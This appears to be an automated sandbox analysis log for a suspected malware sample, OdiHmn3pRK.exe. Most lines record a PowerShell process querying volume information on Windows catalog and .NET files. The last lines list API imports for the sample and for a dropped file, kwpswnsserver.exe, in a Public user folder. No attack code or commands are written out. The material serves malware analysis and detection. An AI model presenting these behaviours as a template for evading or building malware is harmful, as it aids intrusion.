Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401626
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04285D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_04285D22
